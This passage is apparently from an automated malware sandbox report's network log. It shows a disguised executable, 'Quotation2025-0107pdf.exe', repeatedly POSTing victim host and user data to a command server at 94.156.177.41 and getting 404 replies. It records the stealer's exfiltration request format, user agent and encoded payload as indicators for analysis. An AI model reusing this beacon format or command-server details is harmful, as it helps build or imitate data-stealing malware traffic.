                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:59.003526926 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:59.720252037 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:59 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    64192.168.2.44983794.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:59.874048948 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:59.878899097 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:00.607234955 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:00 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    65192.168.2.44984394.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:00.748003960 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:00.752916098 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:01.490128040 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:01 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    66192.168.2.44984994.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:01.657417059 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:01.662273884 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:02.395831108 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:02 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    67192.168.2.44985794.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:02.544653893 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:02.549470901 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:03.285850048 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:03 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    68192.168.2.44986394.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:03.469852924 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:03.476176023 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:04.228163004 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:04 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    69192.168.2.44986994.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:04.415663958 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:04.420628071 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:05.134998083 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:05 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    70192.168.2.44987594.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:05.285053968 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:05.289916992 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:06.011332035 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:05 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    71192.168.2.44988294.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:06.152837992 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:06.157706022 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:06.893781900 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:06 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    72192.168.2.44988894.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:07.163446903 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:07.168337107 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:07.922079086 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:07 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    73192.168.2.44989894.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:08.060486078 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:08.065315962 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:08.808722019 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:08 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    74192.168.2.44990494.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:08.978569984 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:08.983613014 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:09.719271898 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:09 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    75192.168.2.44991094.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:10.029778004 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:10.036766052 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:10.771178007 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:10 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    76192.168.2.44991894.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:10.920401096 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:10.925246954 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:11.659181118 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:11 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    77192.168.2.44992794.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:11.835064888 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:11.841098070 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:12.593288898 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:12 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    78192.168.2.44993394.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:12.949012995 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:12.953871965 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:13.817610025 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:13 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    79192.168.2.44994194.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:13.968759060 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:13.973578930 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:14.698565960 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:14 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    80192.168.2.44995094.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:14.841795921 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:14.849018097 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:15.582880974 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:15 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    81192.168.2.44995694.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:15.799093008 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:15.804831028 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:16.529642105 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
